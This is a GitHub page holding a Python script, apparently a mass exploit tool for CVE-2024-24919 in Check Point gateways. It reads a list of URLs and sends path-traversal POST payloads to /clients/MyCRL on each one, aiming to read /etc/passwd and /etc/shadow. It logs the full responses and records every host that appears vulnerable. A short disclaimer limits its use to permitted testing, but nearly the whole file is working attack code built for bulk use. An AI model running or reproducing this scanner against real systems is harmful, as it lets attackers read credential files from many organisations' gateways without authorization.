-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathCVE-2024-24919-auto.py
151 lines (126 loc) · 5.05 KB
/
CVE-2024-24919-auto.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
import requests
import re
from termcolor import colored
import urllib3
import sys
import argparse
import urllib.parse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
success_count = 0
fail_count = 0
timeout_count = 0
total_urls = 0
vulnerable_urls = []
def display_header():
header = """
____
____ _____ ___ _/_ | ____
/ \\\\__ \\\\ \\/ /| |/ \\
| | \\/ __ \\\\ / | | | \\
|___| (____ /\\_/ |___|___| /
\\/ \\/ \\/
"""
info = """
[CVE-2024-24919] Bulk Scanner
Intended only for educational and testing in corporate environments.
https://twitter.com/nav1n0x/ https://github.com/ifconfig-me takes no responsibility for the code, use at your own risk.
Do not attack a target you don't have permission to engage with.
"""
print(colored(header, 'cyan'))
print(colored(info, 'yellow'))
def check_vulnerability(response):
expected_headers = {
'Server': 'Check Point SVN foundation',
'X-UA-Compatible': 'IE=EmulateIE7',
'X-Frame-Options': 'SAMEORIGIN'
}
match_count = sum(1 for k, v in expected_headers.items() if response.headers.get(k) == v)
status_line_match = response.status_code == 200 and response.raw.version == 10 # HTTP/1.0
return match_count >= 3 and status_line_match
def log_request(f, url, method, headers, data, response, is_exception=False):
f.write(f"{method} /clients/MyCRL HTTP/1.1\n")
for key, value in headers.items():
f.write(f"{key}: {value}\n")
if data:
f.write(f"\n{data}\n")
if is_exception:
f.write(f"\nResponse: {response}\n")
else:
f.write(f"\nResponse Headers:\n")
for key, value in response.headers.items():
f.write(f"{key}: {value}\n")
f.write(f"\nResponse Body:\n{response.text}\n")
f.write("="*80 + "\n")
def get_hostname(url):
parsed_url = urllib.parse.urlparse(url)
return parsed_url.netloc or parsed_url.path
def post_request(url):
global success_count, fail_count, timeout_count, vulnerable_urls
hostname = get_hostname(url)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Host": hostname,
"Content-Length": "39"
}
timeout = 3
payloads = [
"aCSHELL/../../../../../../../etc/passwd",
"aCSHELL/../../../../../../../etc/shadow"
]
is_vulnerable = False
# This is for analyzing purpose only - feel free to remove this.
with open("request-analyze.txt", "a") as f:
for data in payloads:
try:
post_response = requests.post(url + "/clients/MyCRL", headers=headers, data=data, timeout=timeout, verify=False)
log_request(f, url, "POST", headers, data, post_response)
if check_vulnerability(post_response):
is_vulnerable = True
success_count += 1
break
else:
fail_count += 1
except requests.exceptions.Timeout:
timeout_count += 1
log_request(f, url, "POST", headers, data, "Timeout", is_exception=True)
except requests.exceptions.RequestException as e:
fail_count += 1
log_request(f, url, "POST", headers, data, str(e), is_exception=True)
if is_vulnerable:
vulnerable_urls.append(url)
print(f"{colored(' Vulnerable URL found:', 'green')} {url}")
def process_urls_from_file(file_path):
global total_urls
with open(file_path, 'r') as file:
urls = file.readlines()
total_urls = len(urls)
for idx, url in enumerate(urls):
url = url.strip()
if not url.startswith("https://"):
url = "https://" + url
post_request(url)
update_progress(idx + 1)
with open("checkpoint-results.txt", "w") as result_file: # Saves vulnerable URLs to a file
for url in vulnerable_urls:
result_file.write(url + "\n")
def update_progress(scanned):
progress_message = f"{colored('Scanning:', 'yellow')} {scanned}/{total_urls} {colored('Success:', 'green')} {success_count}, {colored('Fail:', 'red')} {fail_count}, {colored('Timeout:', 'blue')} {timeout_count}"
sys.stdout.write('\r' + progress_message)
sys.stdout.flush()
def main():
display_header()
parser = argparse.ArgumentParser(description="Scan URLs for vulnerabilities.")
parser.add_argument('-f', '--file', type=str, required=True, help="Path to the file containing URLs")
args = parser.parse_args()
process_urls_from_file(args.file)
# This part prrints the vulnerable URLs at the end of the run. Feel free to hide, if you have a bulk list as this makes your teminal unresponsive.
print("\n\nVulnerable URLs:")
for url in vulnerable_urls:
print(url)
if __name__ == "__main__":
main()
# Ensure the final output is on a new line
print()